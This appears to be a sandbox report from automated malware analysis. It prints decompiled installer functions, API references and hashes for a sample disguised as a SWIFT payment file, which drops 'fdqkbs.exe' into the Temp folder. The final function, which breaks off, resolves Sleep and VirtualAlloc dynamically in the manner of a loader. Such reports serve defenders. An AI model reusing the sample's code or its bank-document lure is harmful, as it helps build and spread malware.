				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655b
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728), ref: 00406587

Strings

('B, xrefs: 0040655B
"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 0040653D

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CloseQueryValue
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$('B
API String ID: 3356406503-4237221478
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
lstrcatW.KERNEL32(?,0040A014), ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32 ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405f84
0x00405f8e
0x00405f91
0x00405f97
0x00405f98
0x00405f99
0x00405fa1
0x00000000
0x00000000
0x00000000
0x00405fa1
0x00405fa3
0x00405fab

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming,0040313C,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00405F89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming,0040313C,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 00405F99

Strings

C:\Users\user\AppData\Roaming, xrefs: 00405F83

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming
API String ID: 2709904686-2190460797
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: fdqkbs.exePID: 1368, Parent PID: 3396COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	8.3%
Signature Coverage:	6.7%
Total number of Nodes:	1565
Total number of Limit Nodes:	27

Executed Functions

Function 00402571 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 233
windowlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00402571(signed long long __fp0, struct HINSTANCE__* _a4, void* _a12, int _a16) {
				_Unknown_base(*)()* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				struct tagMSG _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				struct tagMONITORINFO _v84;
				struct _WNDCLASSEXW _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t54;
				void* _t55;
				struct HINSTANCE__* _t63;
				int _t65;
				struct HMONITOR__* _t70;
				int _t72;
				struct HWND__* _t73;
				int _t81;
				int _t83;
				int _t85;
				void* _t92;
				long _t94;
				WCHAR* _t104;
				int _t106;
				struct HACCEL__* _t107;
				long _t108;
				intOrPtr _t110;
				signed int _t112;
				intOrPtr _t114;
				int _t117;
				void* _t119;
				void* _t121;
				signed int _t122;
				void* _t127;
				signed long long _t135;

				_t135 = __fp0;
				_t104 = L"Kernel32.dll";
				_v8 = GetProcAddress(GetModuleHandleW(_t104), "GetTickCount");
				_v12 = GetProcAddress(GetModuleHandleW(_t104), "Sleep");
				_v16 = GetProcAddress(GetModuleHandleW(_t104), "VirtualAlloc");
